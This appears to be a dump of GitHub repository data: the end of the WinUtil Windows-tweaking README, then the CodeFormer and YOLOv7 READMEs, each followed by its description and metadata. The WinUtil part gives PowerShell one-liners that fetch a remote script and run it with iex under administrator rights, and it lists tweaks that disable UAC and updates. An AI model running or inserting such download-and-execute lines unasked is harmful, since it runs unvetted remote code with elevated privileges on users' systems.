when it's done. ## Issues: - If you are unable to resolve christitus.com/win and are getting errors launching the tool, it might be due to India blocking GitHub's content domain and preventing downloads. You may use a VPN or change your DNS provider to Google/Cloudflare/etc. Source: <https://timesofindia.indiatimes.com/gadgets-news/github-content-domain-blocked-for-these-indian-users-reports/articleshow/96687992.cms> - Windows Security (formerly Defender) and other anti-virus software are known to block the script. The script gets flagged because it requires administrator privileges and makes drastic system changes. 
- If you are having TLS 1.2 issues or are having trouble resolving `christitus.com/win`, then run with the following command: ``` [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;iex(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ChrisTitusTech/winutil/main/winutil.ps1') ``` If you are still having issues, try changing your DNS provider to 1.1.1.1 || 1.0.0.1 or 8.8.8.8 || 8.8.4.4. ## Support - To morally and mentally support the project, make sure to leave a ⭐️! - EXE Wrapper for $10 @ https://www.cttstore.com/windows-toolbox ## Tutorial [![Watch the video](https://img.youtube.com/vi/6UQZ5oQg8XA/hqdefault.jpg)](https://www.youtube.com/watch?v=6UQZ5oQg8XA) ## Overview - Install - Install Selection: Organize programs by category and facilitate installation by enabling users to select programs and initiate the installation process with a single click. - Upgrade All: Upgrade all existing programs to their latest versions, ensuring users have the most up-to-date and feature-rich software. - Uninstall Selection: Effortlessly uninstall selected programs, providing users with a streamlined way to remove unwanted software from their system. - Get Installed: Retrieve a comprehensive list of installed programs on the system, offering users visibility into the software currently installed on their computer. - Import / Export: Enable users to import or export the selection list of programs, allowing them to save their preferred program configurations or share them with others. This feature promotes convenience and flexibility in managing program selections across different systems. - Tweaks - Recommended Selection: Provides pre-defined templates tailored for desktop, laptop, and minimal configurations, allowing users to select recommended settings and optimizations specific to their system type. - Essential Tweaks: Offers a collection of essential tweaks aimed at improving system performance, privacy, and resource utilization. These tweaks include creating a system restore point, disabling telemetry and Wi-Fi Sense, setting services to manual, and disabling location tracking and HomeGroup, among others. - Advanced Tweaks: Encompasses a range of advanced power-user tweaks to further optimize the system. These tweaks include removing OneDrive and Edge, and disabling User Account Control (UAC) and the notification panel, among others. - Toggles: Adds easy-to-use, one-click shortcuts for toggling dark mode, NumLock on startup, file extensions, sticky keys, among others. - Additional Tweaks: Introduces various other tweaks such as enabling dark mode, changing DNS settings, adding an Ultimate Performance mode, and creating shortcuts for WinUtil tools. These tweaks provide users with additional customization options to tailor their system to their preferences. - Config - Features: Allows users to easily install various essential components and features to enhance their Windows experience. These features include installing .NET Frameworks, enabling Hyper-V virtualization, enabling legacy media support for Windows Media Player and DirectPlay, enabling NFS (Network File System) for network file sharing, and enabling Windows Subsystem for Linux (WSL) for running Linux applications on Windows. - Fixes: Provides a range of helpful fixes to address common issues and improve system stability. 
This includes setting up autologon for seamless login experiences, resetting Windows updates to resolve update-related problems, performing a system corruption scan to detect and repair corrupted files, and resetting network settings to troubleshoot network connectivity issues. - Legacy Windows Panels: Includes access to legacy Windows panels from Windows 7, allowing users to access familiar and powerful tools. These panels include Control Panel for managing system settings, Network Connections for configuring network adapters and connections, Power Panel for adjusting power and sleep settings, Sound Settings for managing audio devices and settings, System Properties for viewing and modifying system information, and User Accounts for managing user profiles and account settings. - Updates: - Default (Out of Box) Settings: Provides the default settings that come with Windows for updates. - Security (Recommended) Settings: Offers recommended settings, including a slight delay of feature updates by 2 years and installation of security updates 4 days after release. - Disable All Updates (Not Recommended!): Allows users to disable all Windows updates, but it's not recommended due to potential security risks. Video and Written Article walkthrough @ <https://christitus.com/windows-tool/> ## Issues If you encounter any challenges or problems with the script, I kindly request that you submit them via the "Issues" tab on the GitHub repository. By filling out the provided template, you can provide specific details about the issue, allowing me to promptly address any bugs or consider feature requests. ## Contribute Code Pull Requests are now handled directly on the MAIN branch. This was done since we can now select specific releases to launch via releases in GitHub. If you are making a code change, you can submit a PR to the main branch, but I am very selective about these. Do not use a code formatter, do not make massive amounts of line changes, and do not bundle multiple feature changes together. EACH FEATURE CHANGE SHOULD BE ITS OWN Pull Request! When creating pull requests, it is essential to thoroughly document all changes made. This includes documenting any additions made to the tweaks section and ensuring that corresponding undo measures are in place to remove the newly added tweaks if necessary. Failure to adhere to this format may result in denial of the pull request. Additionally, comprehensive documentation is required for all code changes. Any code lacking sufficient documentation may also be denied. By following these guidelines, we can maintain a high standard of quality and ensure that the codebase remains organized and well-documented. NOTE: When creating a function, please include "WPF" or "WinUtil" in the name so that it can be loaded into the runspace. ## Thanks to all Contributors Thanks a lot for spending your time helping Winutil grow. Keep rocking 🍻. [![Contributors](https://contrib.rocks/image?repo=ChrisTitusTech/winutil)](https://github.com/ChrisTitusTech/winutil/graphs/contributors) ## GitHub Stats ![Alt](https://repobeats.axiom.co/api/embed/aad37eec9114c507f109d34ff8d38a59adc9503f.svg "Repobeats analytics image")
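Referring back to step 6 of the Automation section above: the invocation below is the README's own command with a hypothetical path filled in. `C:\setup\winutil.json` is a placeholder for the config file exported in step 2; substitute your own path.

```powershell
# Hypothetical example of the automation command from step 6 above.
# C:\setup\winutil.json is a placeholder path; substitute your own exported config file.
iex "& { $(irm christitus.com/win) } -Config C:\setup\winutil.json -Run"
```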
Chris Titus Tech's Windows Utility - Install Programs, Tweaks, Fixes, and Updates
null
5
150
763
250
58
1
4
sczhou/CodeFormer
<p align="center"> <img src="assets/CodeFormer_logo.png" height=110> </p> ## Towards Robust Blind Face Restoration with Codebook Lookup Transformer (NeurIPS 2022) [Paper](https://arxiv.org/abs/2206.11253) | [Project Page](https://shangchenzhou.com/projects/CodeFormer/) | [Video](https://youtu.be/d3VDpkXlueI) <a href="https://colab.research.google.com/drive/1m52PNveE4PBhYrecj34cnpEeiHcC5LTb?usp=sharing"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="google colab logo"></a> [![Hugging Face](https://img.shields.io/badge/Demo-%F0%9F%A4%97%20Hugging%20Face-blue)](https://huggingface.co/spaces/sczhou/CodeFormer) [![Replicate](https://img.shields.io/badge/Demo-%F0%9F%9A%80%20Replicate-blue)](https://replicate.com/sczhou/codeformer) [![OpenXLab](https://img.shields.io/badge/Demo-%F0%9F%90%BC%20OpenXLab-blue)](https://openxlab.org.cn/apps/detail/ShangchenZhou/CodeFormer) ![Visitors](https://api.infinitescript.com/badgen/count?name=sczhou/CodeFormer&ltext=Visitors) [Shangchen Zhou](https://shangchenzhou.com/), [Kelvin C.K. Chan](https://ckkelvinchan.github.io/), [Chongyi Li](https://li-chongyi.github.io/), [Chen Change Loy](https://www.mmlab-ntu.com/person/ccloy/) S-Lab, Nanyang Technological University <img src="assets/network.jpg" width="800px"/> :star: If CodeFormer is helpful to your images or projects, please help star this repo. Thanks! :hugs: ### Update - **2023.07.20**: Integrated to :panda_face: [OpenXLab](https://openxlab.org.cn/apps). Try out online demo! [![OpenXLab](https://img.shields.io/badge/Demo-%F0%9F%90%BC%20OpenXLab-blue)](https://openxlab.org.cn/apps/detail/ShangchenZhou/CodeFormer) - **2023.04.19**: :whale: Training codes and config files are public available now. - **2023.04.09**: Add features of inpainting and colorization for cropped and aligned face images. - **2023.02.10**: Include `dlib` as a new face detector option, it produces more accurate face identity. - **2022.10.05**: Support video input `--input_path [YOUR_VIDEO.mp4]`. Try it to enhance your videos! :clapper: - **2022.09.14**: Integrated to :hugs: [Hugging Face](https://huggingface.co/spaces). Try out online demo! [![Hugging Face](https://img.shields.io/badge/Demo-%F0%9F%A4%97%20Hugging%20Face-blue)](https://huggingface.co/spaces/sczhou/CodeFormer) - **2022.09.09**: Integrated to :rocket: [Replicate](https://replicate.com/explore). Try out online demo! 
[![Replicate](https://img.shields.io/badge/Demo-%F0%9F%9A%80%20Replicate-blue)](https://replicate.com/sczhou/codeformer) - [**More**](docs/history_changelog.md) ### TODO - [x] Add training code and config files - [x] Add checkpoint and script for face inpainting - [x] Add checkpoint and script for face colorization - [x] ~~Add background image enhancement~~ #### :panda_face: Try Enhancing Old Photos / Fixing AI-arts [<img src="assets/imgsli_1.jpg" height="226px"/>](https://imgsli.com/MTI3NTE2) [<img src="assets/imgsli_2.jpg" height="226px"/>](https://imgsli.com/MTI3NTE1) [<img src="assets/imgsli_3.jpg" height="226px"/>](https://imgsli.com/MTI3NTIw) #### Face Restoration <img src="assets/restoration_result1.png" width="400px"/> <img src="assets/restoration_result2.png" width="400px"/> <img src="assets/restoration_result3.png" width="400px"/> <img src="assets/restoration_result4.png" width="400px"/> #### Face Color Enhancement and Restoration <img src="assets/color_enhancement_result1.png" width="400px"/> <img src="assets/color_enhancement_result2.png" width="400px"/> #### Face Inpainting <img src="assets/inpainting_result1.png" width="400px"/> <img src="assets/inpainting_result2.png" width="400px"/> ### Dependencies and Installation - Pytorch >= 1.7.1 - CUDA >= 10.1 - Other required packages in `requirements.txt` ``` # git clone this repository git clone https://github.com/sczhou/CodeFormer cd CodeFormer # create new anaconda env conda create -n codeformer python=3.8 -y conda activate codeformer # install python dependencies pip3 install -r requirements.txt python basicsr/setup.py develop conda install -c conda-forge dlib  # only for face detection or cropping with dlib ``` ### Quick Inference #### Download Pre-trained Models: Download the facelib and dlib pretrained models from [[Releases](https://github.com/sczhou/CodeFormer/releases/tag/v0.1.0) | [Google Drive](https://drive.google.com/drive/folders/1b_3qwrzY_kTQh0-SnBoGBgOrJ_PLZSKm?usp=sharing) | [OneDrive](https://entuedu-my.sharepoint.com/:f:/g/personal/s200094_e_ntu_edu_sg/EvDxR7FcAbZMp_MA9ouq7aQB8XTppMb3-T0uGZ_2anI2mg?e=DXsJFo)] to the `weights/facelib` folder. You can manually download the pretrained models or download them by running the following command: ``` python scripts/download_pretrained_models.py facelib python scripts/download_pretrained_models.py dlib  # only for the dlib face detector ``` Download the CodeFormer pretrained models from [[Releases](https://github.com/sczhou/CodeFormer/releases/tag/v0.1.0) | [Google Drive](https://drive.google.com/drive/folders/1CNNByjHDFt0b95q54yMVp6Ifo5iuU6QS?usp=sharing) | [OneDrive](https://entuedu-my.sharepoint.com/:f:/g/personal/s200094_e_ntu_edu_sg/EoKFj4wo8cdIn2-TY2IV6CYBhZ0pIG4kUOeHdPR_A5nlbg?e=AO8UN9)] to the `weights/CodeFormer` folder. You can manually download the pretrained models or download them by running the following command: ``` python scripts/download_pretrained_models.py CodeFormer ``` #### Prepare Testing Data: You can put the testing images in the `inputs/TestWhole` folder. If you would like to test on cropped and aligned faces, you can put them in the `inputs/cropped_faces` folder. 
You can get the cropped and aligned faces by running the following command: ``` # you may need to install dlib via: conda install -c conda-forge dlib python scripts/crop_align_face.py -i [input folder] -o [output folder] ``` #### Testing: [Note] If you want to compare CodeFormer in your paper, please run the following command indicating `--has_aligned` (for cropped and aligned faces), as the whole-image command involves a face-background fusion step that may damage hair texture at the boundary, leading to an unfair comparison. Fidelity weight *w* lies in [0, 1]. Generally, smaller *w* tends to produce a higher-quality result, while larger *w* yields a higher-fidelity result. The results will be saved in the `results` folder (a small parameter-sweep sketch appears at the end of this README). 🧑🏻 Face Restoration (cropped and aligned face) ``` # For cropped and aligned faces (512x512) python inference_codeformer.py -w 0.5 --has_aligned --input_path [image folder]|[image path] ``` :framed_picture: Whole Image Enhancement ``` # For whole image # Add '--bg_upsampler realesrgan' to enhance the background regions with Real-ESRGAN # Add '--face_upsample' to further upsample the restored face with Real-ESRGAN python inference_codeformer.py -w 0.7 --input_path [image folder]|[image path] ``` :clapper: Video Enhancement ``` # For Windows/Mac users, please install ffmpeg first conda install -c conda-forge ffmpeg ``` ``` # For video clips # Video path should end with '.mp4'|'.mov'|'.avi' python inference_codeformer.py --bg_upsampler realesrgan --face_upsample -w 1.0 --input_path [video path] ``` 🌈 Face Colorization (cropped and aligned face) ``` # For cropped and aligned faces (512x512) # Colorize black and white or faded photos python inference_colorization.py --input_path [image folder]|[image path] ``` 🎨 Face Inpainting (cropped and aligned face) ``` # For cropped and aligned faces (512x512) # Inputs can be masked with a white brush using an image editing app (e.g., Photoshop) # (check out the examples in inputs/masked_faces) python inference_inpainting.py --input_path [image folder]|[image path] ``` ### Training: The training commands can be found in the documents: [English](docs/train.md) **|** [简体中文](docs/train_CN.md). ### Citation If our work is useful for your research, please consider citing: @inproceedings{zhou2022codeformer, author = {Zhou, Shangchen and Chan, Kelvin C.K. and Li, Chongyi and Loy, Chen Change}, title = {Towards Robust Blind Face Restoration with Codebook Lookup TransFormer}, booktitle = {NeurIPS}, year = {2022} } ### License This project is licensed under <a rel="license" href="https://github.com/sczhou/CodeFormer/blob/master/LICENSE">NTU S-Lab License 1.0</a>. Redistribution and use should follow this license. ### Acknowledgement This project is based on [BasicSR](https://github.com/XPixelGroup/BasicSR). Some code is borrowed from [Unleashing Transformers](https://github.com/samb-t/unleashing-transformers), [YOLOv5-face](https://github.com/deepcam-cn/yolov5-face), and [FaceXLib](https://github.com/xinntao/facexlib). We also adopt [Real-ESRGAN](https://github.com/xinntao/Real-ESRGAN) to support background image enhancement. Thanks for their awesome work. ### Contact If you have any questions, please feel free to reach out to me at `shangchenzhou@gmail.com`.
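As a companion to the fidelity-weight note in the Testing section: since the best *w* depends on the input, a quick way to choose it is to run the same inputs at several values and compare the outputs side by side. A minimal sketch, assuming it is run from the repo root as in the commands above; `inputs/cropped_faces` is the example folder mentioned in this README.

```python
# Hedged sketch: sweep the fidelity weight w (smaller = higher quality,
# larger = higher fidelity) by running the documented inference script per value.
import subprocess

for w in (0.3, 0.5, 0.7, 1.0):
    subprocess.run(
        [
            "python", "inference_codeformer.py",
            "-w", str(w),
            "--has_aligned",                        # inputs are cropped/aligned 512x512 faces
            "--input_path", "inputs/cropped_faces", # example folder from this repo
        ],
        check=True,  # stop the sweep if any run fails
    )
```

Each run writes into the `results` folder described above; keep the *w* whose outputs best balance quality and fidelity for your images.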
[NeurIPS 2022] Towards Robust Blind Face Restoration with Codebook Lookup Transformer
codebook,codeformer,face-enhancement,face-restoration,pytorch,super-resolution,vqgan,restoration
1
3
44
71
215
1
0
WongKinYiu/yolov7
# Official YOLOv7 Implementation of paper - [YOLOv7: Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors](https://arxiv.org/abs/2207.02696) [![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/yolov7-trainable-bag-of-freebies-sets-new/real-time-object-detection-on-coco)](https://paperswithcode.com/sota/real-time-object-detection-on-coco?p=yolov7-trainable-bag-of-freebies-sets-new) [![Hugging Face Spaces](https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue)](https://huggingface.co/spaces/akhaliq/yolov7) <a href="https://colab.research.google.com/gist/AlexeyAB/b769f5795e65fdab80086f6cb7940dae/yolov7detection.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> [![arxiv.org](http://img.shields.io/badge/cs.CV-arXiv%3A2207.02696-B31B1B.svg)](https://arxiv.org/abs/2207.02696) <div align="center"> <a href="./"> <img src="./figure/performance.png" width="79%"/> </a> </div> ## Web Demo - Integrated into [Huggingface Spaces ๐Ÿค—](https://huggingface.co/spaces/akhaliq/yolov7) using Gradio. Try out the Web Demo [![Hugging Face Spaces](https://img.shields.io/badge/%F0%9F%A4%97%20Hugging%20Face-Spaces-blue)](https://huggingface.co/spaces/akhaliq/yolov7) ## Performance MS COCO | Model | Test Size | AP<sup>test</sup> | AP<sub>50</sub><sup>test</sup> | AP<sub>75</sub><sup>test</sup> | batch 1 fps | batch 32 average time | | :-- | :-: | :-: | :-: | :-: | :-: | :-: | | [**YOLOv7**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7.pt) | 640 | **51.4%** | **69.7%** | **55.9%** | 161 *fps* | 2.8 *ms* | | [**YOLOv7-X**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7x.pt) | 640 | **53.1%** | **71.2%** | **57.8%** | 114 *fps* | 4.3 *ms* | | | | | | | | | | [**YOLOv7-W6**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-w6.pt) | 1280 | **54.9%** | **72.6%** | **60.1%** | 84 *fps* | 7.6 *ms* | | [**YOLOv7-E6**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6.pt) | 1280 | **56.0%** | **73.5%** | **61.2%** | 56 *fps* | 12.3 *ms* | | [**YOLOv7-D6**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-d6.pt) | 1280 | **56.6%** | **74.0%** | **61.8%** | 44 *fps* | 15.0 *ms* | | [**YOLOv7-E6E**](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6e.pt) | 1280 | **56.8%** | **74.4%** | **62.1%** | 36 *fps* | 18.7 *ms* | ## Installation Docker environment (recommended) <details><summary> <b>Expand</b> </summary> ``` shell # create the docker container, you can change the share memory size if you have more. 
nvidia-docker run --name yolov7 -it -v your_coco_path/:/coco/ -v your_code_path/:/yolov7 --shm-size=64g nvcr.io/nvidia/pytorch:21.08-py3 # apt install required packages apt update apt install -y zip htop screen libgl1-mesa-glx # pip install required packages pip install seaborn thop # go to code folder cd /yolov7 ``` </details> ## Testing [`yolov7.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7.pt) [`yolov7x.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7x.pt) [`yolov7-w6.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-w6.pt) [`yolov7-e6.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6.pt) [`yolov7-d6.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-d6.pt) [`yolov7-e6e.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6e.pt) ``` shell python test.py --data data/coco.yaml --img 640 --batch 32 --conf 0.001 --iou 0.65 --device 0 --weights yolov7.pt --name yolov7_640_val ``` You will get the results: ``` Average Precision (AP) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.51206 Average Precision (AP) @[ IoU=0.50 | area= all | maxDets=100 ] = 0.69730 Average Precision (AP) @[ IoU=0.75 | area= all | maxDets=100 ] = 0.55521 Average Precision (AP) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.35247 Average Precision (AP) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.55937 Average Precision (AP) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.66693 Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 1 ] = 0.38453 Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets= 10 ] = 0.63765 Average Recall (AR) @[ IoU=0.50:0.95 | area= all | maxDets=100 ] = 0.68772 Average Recall (AR) @[ IoU=0.50:0.95 | area= small | maxDets=100 ] = 0.53766 Average Recall (AR) @[ IoU=0.50:0.95 | area=medium | maxDets=100 ] = 0.73549 Average Recall (AR) @[ IoU=0.50:0.95 | area= large | maxDets=100 ] = 0.83868 ``` To measure accuracy, download the [COCO annotations for pycocotools](http://images.cocodataset.org/annotations/annotations_trainval2017.zip) to `./coco/annotations/instances_val2017.json`. ## Training Data preparation ``` shell bash scripts/get_coco.sh ``` * Download MS COCO dataset images ([train](http://images.cocodataset.org/zips/train2017.zip), [val](http://images.cocodataset.org/zips/val2017.zip), [test](http://images.cocodataset.org/zips/test2017.zip)) and [labels](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/coco2017labels-segments.zip). 
If you have previously used a different version of YOLO, we strongly recommend that you delete `train2017.cache` and `val2017.cache` files, and redownload [labels](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/coco2017labels-segments.zip) Single GPU training ``` shell # train p5 models python train.py --workers 8 --device 0 --batch-size 32 --data data/coco.yaml --img 640 640 --cfg cfg/training/yolov7.yaml --weights '' --name yolov7 --hyp data/hyp.scratch.p5.yaml # train p6 models python train_aux.py --workers 8 --device 0 --batch-size 16 --data data/coco.yaml --img 1280 1280 --cfg cfg/training/yolov7-w6.yaml --weights '' --name yolov7-w6 --hyp data/hyp.scratch.p6.yaml ``` Multiple GPU training ``` shell # train p5 models python -m torch.distributed.launch --nproc_per_node 4 --master_port 9527 train.py --workers 8 --device 0,1,2,3 --sync-bn --batch-size 128 --data data/coco.yaml --img 640 640 --cfg cfg/training/yolov7.yaml --weights '' --name yolov7 --hyp data/hyp.scratch.p5.yaml # train p6 models python -m torch.distributed.launch --nproc_per_node 8 --master_port 9527 train_aux.py --workers 8 --device 0,1,2,3,4,5,6,7 --sync-bn --batch-size 128 --data data/coco.yaml --img 1280 1280 --cfg cfg/training/yolov7-w6.yaml --weights '' --name yolov7-w6 --hyp data/hyp.scratch.p6.yaml ``` ## Transfer learning [`yolov7_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7_training.pt) [`yolov7x_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7x_training.pt) [`yolov7-w6_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-w6_training.pt) [`yolov7-e6_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6_training.pt) [`yolov7-d6_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-d6_training.pt) [`yolov7-e6e_training.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-e6e_training.pt) Single GPU finetuning for custom dataset ``` shell # finetune p5 models python train.py --workers 8 --device 0 --batch-size 32 --data data/custom.yaml --img 640 640 --cfg cfg/training/yolov7-custom.yaml --weights 'yolov7_training.pt' --name yolov7-custom --hyp data/hyp.scratch.custom.yaml # finetune p6 models python train_aux.py --workers 8 --device 0 --batch-size 16 --data data/custom.yaml --img 1280 1280 --cfg cfg/training/yolov7-w6-custom.yaml --weights 'yolov7-w6_training.pt' --name yolov7-w6-custom --hyp data/hyp.scratch.custom.yaml ``` ## Re-parameterization See [reparameterization.ipynb](tools/reparameterization.ipynb) ## Inference On video: ``` shell python detect.py --weights yolov7.pt --conf 0.25 --img-size 640 --source yourvideo.mp4 ``` On image: ``` shell python detect.py --weights yolov7.pt --conf 0.25 --img-size 640 --source inference/images/horses.jpg ``` <div align="center"> <a href="./"> <img src="./figure/horses_prediction.jpg" width="59%"/> </a> </div> ## Export **Pytorch to CoreML (and inference on MacOS/iOS)** <a href="https://colab.research.google.com/github/WongKinYiu/yolov7/blob/main/tools/YOLOv7CoreML.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> **Pytorch to ONNX with NMS (and inference)** <a href="https://colab.research.google.com/github/WongKinYiu/yolov7/blob/main/tools/YOLOv7onnx.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> ```shell python export.py --weights yolov7-tiny.pt --grid --end2end --simplify \ 
--topk-all 100 --iou-thres 0.65 --conf-thres 0.35 --img-size 640 640 --max-wh 640 ``` **Pytorch to TensorRT with NMS (and inference)** <a href="https://colab.research.google.com/github/WongKinYiu/yolov7/blob/main/tools/YOLOv7trt.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> ```shell wget https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-tiny.pt python export.py --weights ./yolov7-tiny.pt --grid --end2end --simplify --topk-all 100 --iou-thres 0.65 --conf-thres 0.35 --img-size 640 640 git clone https://github.com/Linaom1214/tensorrt-python.git python ./tensorrt-python/export.py -o yolov7-tiny.onnx -e yolov7-tiny-nms.trt -p fp16 ``` **Pytorch to TensorRT another way** <a href="https://colab.research.google.com/gist/AlexeyAB/fcb47ae544cf284eb24d8ad8e880d45c/yolov7trtlinaom.ipynb"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"></a> <details><summary> <b>Expand</b> </summary> ```shell wget https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-tiny.pt python export.py --weights yolov7-tiny.pt --grid --include-nms git clone https://github.com/Linaom1214/tensorrt-python.git python ./tensorrt-python/export.py -o yolov7-tiny.onnx -e yolov7-tiny-nms.trt -p fp16 # Or use trtexec to convert ONNX to TensorRT engine /usr/src/tensorrt/bin/trtexec --onnx=yolov7-tiny.onnx --saveEngine=yolov7-tiny-nms.trt --fp16 ``` </details> Tested with: Python 3.7.13, Pytorch 1.12.0+cu113 ## Pose estimation [`code`](https://github.com/WongKinYiu/yolov7/tree/pose) [`yolov7-w6-pose.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-w6-pose.pt) See [keypoint.ipynb](https://github.com/WongKinYiu/yolov7/blob/main/tools/keypoint.ipynb). <div align="center"> <a href="./"> <img src="./figure/pose.png" width="39%"/> </a> </div> ## Instance segmentation (with NTU) [`code`](https://github.com/WongKinYiu/yolov7/tree/mask) [`yolov7-mask.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-mask.pt) See [instance.ipynb](https://github.com/WongKinYiu/yolov7/blob/main/tools/instance.ipynb). 
<div align="center"> <a href="./"> <img src="./figure/mask.png" width="59%"/> </a> </div> ## Instance segmentation [`code`](https://github.com/WongKinYiu/yolov7/tree/u7/seg) [`yolov7-seg.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-seg.pt) YOLOv7 for instance segmentation (YOLOR + YOLOv5 + YOLACT) | Model | Test Size | AP<sup>box</sup> | AP<sub>50</sub><sup>box</sup> | AP<sub>75</sub><sup>box</sup> | AP<sup>mask</sup> | AP<sub>50</sub><sup>mask</sup> | AP<sub>75</sub><sup>mask</sup> | | :-- | :-: | :-: | :-: | :-: | :-: | :-: | :-: | | **YOLOv7-seg** | 640 | **51.4%** | **69.4%** | **55.8%** | **41.5%** | **65.5%** | **43.7%** | ## Anchor free detection head [`code`](https://github.com/WongKinYiu/yolov7/tree/u6) [`yolov7-u6.pt`](https://github.com/WongKinYiu/yolov7/releases/download/v0.1/yolov7-u6.pt) YOLOv7 with decoupled TAL head (YOLOR + YOLOv5 + YOLOv6) | Model | Test Size | AP<sup>val</sup> | AP<sub>50</sub><sup>val</sup> | AP<sub>75</sub><sup>val</sup> | | :-- | :-: | :-: | :-: | :-: | | **YOLOv7-u6** | 640 | **52.6%** | **69.7%** | **57.3%** | ## Citation ``` @inproceedings{wang2023yolov7, title={{YOLOv7}: Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors}, author={Wang, Chien-Yao and Bochkovskiy, Alexey and Liao, Hong-Yuan Mark}, booktitle={Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)}, year={2023} } ``` ``` @article{wang2023designing, title={Designing Network Design Strategies Through Gradient Path Analysis}, author={Wang, Chien-Yao and Liao, Hong-Yuan Mark and Yeh, I-Hau}, journal={Journal of Information Science and Engineering}, year={2023} } ``` ## Teaser YOLOv7-semantic & YOLOv7-panoptic & YOLOv7-caption <div align="center"> <a href="./"> <img src="./figure/tennis.jpg" width="24%"/> </a> <a href="./"> <img src="./figure/tennis_semantic.jpg" width="24%"/> </a> <a href="./"> <img src="./figure/tennis_panoptic.png" width="24%"/> </a> <a href="./"> <img src="./figure/tennis_caption.png" width="24%"/> </a> </div> YOLOv7-semantic & YOLOv7-detection & YOLOv7-depth (with NTUT) <div align="center"> <a href="./"> <img src="./figure/yolov7_city.jpg" width="80%"/> </a> </div> YOLOv7-3d-detection & YOLOv7-lidar & YOLOv7-road (with NTUT) <div align="center"> <a href="./"> <img src="./figure/yolov7_3d.jpg" width="30%"/> </a> <a href="./"> <img src="./figure/yolov7_lidar.jpg" width="30%"/> </a> <a href="./"> <img src="./figure/yolov7_road.jpg" width="30%"/> </a> </div> ## Acknowledgements <details><summary> <b>Expand</b> </summary> * [https://github.com/AlexeyAB/darknet](https://github.com/AlexeyAB/darknet) * [https://github.com/WongKinYiu/yolor](https://github.com/WongKinYiu/yolor) * [https://github.com/WongKinYiu/PyTorch_YOLOv4](https://github.com/WongKinYiu/PyTorch_YOLOv4) * [https://github.com/WongKinYiu/ScaledYOLOv4](https://github.com/WongKinYiu/ScaledYOLOv4) * [https://github.com/Megvii-BaseDetection/YOLOX](https://github.com/Megvii-BaseDetection/YOLOX) * [https://github.com/ultralytics/yolov3](https://github.com/ultralytics/yolov3) * [https://github.com/ultralytics/yolov5](https://github.com/ultralytics/yolov5) * [https://github.com/DingXiaoH/RepVGG](https://github.com/DingXiaoH/RepVGG) * [https://github.com/JUGGHM/OREPA_CVPR2022](https://github.com/JUGGHM/OREPA_CVPR2022) * [https://github.com/TexasInstruments/edgeai-yolov5/tree/yolo-pose](https://github.com/TexasInstruments/edgeai-yolov5/tree/yolo-pose) </details>
Implementation of paper - YOLOv7: Trainable bag-of-freebies sets new state-of-the-art for real-time object detectors
scaled-yolov4,yolor,yolov3,yolov4,yolov7,darknet,pytorch
1
30
242
134
1,414
9
0